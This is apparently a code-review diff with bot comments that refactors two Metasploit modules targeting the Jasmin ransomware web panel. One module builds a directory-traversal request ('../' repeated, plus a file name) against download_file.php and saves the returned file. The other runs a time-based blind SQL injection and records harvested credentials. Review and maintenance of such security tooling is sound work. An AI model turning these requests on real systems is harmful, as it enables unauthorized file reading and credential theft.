diff --git a/modules/auxiliary/gather/jasmin_ransomware_dir_traversal.rb b/modules/auxiliary/gather/jasmin_ransomware_dir_traversal.rb
index 72da2fa8a56ef..fa83ab4d63413 100644
--- a/modules/auxiliary/gather/jasmin_ransomware_dir_traversal.rb
+++ b/modules/auxiliary/gather/jasmin_ransomware_dir_traversal.rb
@@ -6,7 +6,6 @@
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
- include Msf::Auxiliary::Scanner
def initialize(info = {})
super(
@@ -47,27 +46,33 @@ def initialize(info = {})
)
end
- def run_host(ip)
+ def check
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path)
)
+ return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
+ return Exploit::CheckCode::Safe("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
- fail_with(Failure::NotFound, 'Check TARGETURI, Jasmin Dashboard not detected') unless res.body.include? '
Jasmin Dashboard'
+ Exploit::CheckCode::Detected('Jasmin Login page detected') if res.body.include? 'Jasmin Dashboard'
+ end
+ def run
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'download_file.php'),
'vars_get' => {
'file' => "#{'../' * datastore['DEPTH']}#{datastore['FILE']}"
}
)
+ fail_with(Failure::Unknown, 'No response from server') if res.nil?
fail_with(Failure::NotFound, 'Check FILE or DEPTH, file not found on server') if res.body.empty?
+ fail_with(Failure::UnexpectedReply, "Server returned an unexpected HTTP code: #{res.code}") unless res.code == 200
print_good(res.body)
# store loot
path = store_loot(
'jasmin.webpanel.dir.traversal',
'text/plain',
- ip,
+ datastore['rhost'],
res.body,
File.basename(datastore['FILE'])
)
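Review bot: `check` ends on `Exploit::CheckCode::Detected(...) if res.body.include? 'Jasmin Dashboard'`, so a 200 response without that marker makes the method return nil instead of a check code. Make the fallthrough explicit, e.g. `return Exploit::CheckCode::Detected('Jasmin Login page detected') if res.body.include?('Jasmin Dashboard')` followed by `Exploit::CheckCode::Safe('Jasmin Dashboard not detected')`. The same applies to `check` in jasmin_ransomware_sqli.rb. In `run`, the `res.body.empty?` test runs before the status-code test, so a non-200 reply with an empty body is reported as "file not found"; moving the `res.code == 200` line above it gives the more accurate failure. `run` continues past the end of this hunk.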
diff --git a/modules/auxiliary/gather/jasmin_ransomware_sqli.rb b/modules/auxiliary/gather/jasmin_ransomware_sqli.rb
index 39b6c738440f6..109038377f217 100644
--- a/modules/auxiliary/gather/jasmin_ransomware_sqli.rb
+++ b/modules/auxiliary/gather/jasmin_ransomware_sqli.rb
@@ -7,7 +7,6 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::SQLi
- include Msf::Auxiliary::Scanner
def initialize(info = {})
super(
@@ -49,13 +48,17 @@ def initialize(info = {})
)
end
- def run_host(ip)
+ def check
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path)
)
+ return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
+ return Exploit::CheckCode::Safe("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
- fail_with(Failure::NotFound, 'Check TARGETURI, Jasmin Dashboard not detected') unless res.body.include? 'Jasmin Dashboard'
+ Exploit::CheckCode::Detected('Jasmin Login page detected') if res.body.include? 'Jasmin Dashboard'
+ end
+ def run
@sqli = create_sqli(dbms: MySQLi::TimeBasedBlind) do |payload|
check_char = Rex::Text.rand_text_alpha_lower(5)
res = send_request_cgi({
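Review bot: With the dashboard detection moved into `check`, `run` starts its time-based blind requests without confirming that TARGETURI is a Jasmin panel, which the removed `fail_with(Failure::NotFound, ...)` in `run_host` used to guarantee. If the module does not already `prepend Msf::Exploit::Remote::AutoCheck` (not visible in this hunk), consider adding it so the check gates `run` and no requests go to an unrelated service. The same holds for `run` in jasmin_ransomware_dir_traversal.rb. `run` begins here and its body continues outside the hunk.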
@@ -88,7 +91,7 @@ def run_host(ip)
private_type: :password,
private_data: user[1],
service_name: 'Jasmin Webpanel',
- address: ip,
+ address: datastore['RHOST'],
port: datastore['RPORT'],
protocol: 'tcp',
status: Metasploit::Model::Login::Status::UNTRIED
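Review bot: The host is read as `datastore['RHOST']` here but as `datastore['rhost']` in the `store_loot` call in jasmin_ransomware_dir_traversal.rb. Pick one spelling, or use the HttpClient helpers so both modules read `address: rhost, port: rport`. With the Scanner mixin gone the value is no longer the per-host `ip` argument, so if RHOST can hold a hostname the stored credential address may not be an IP; that is worth confirming against what the credential report expects. The enclosing method starts and ends outside this hunk.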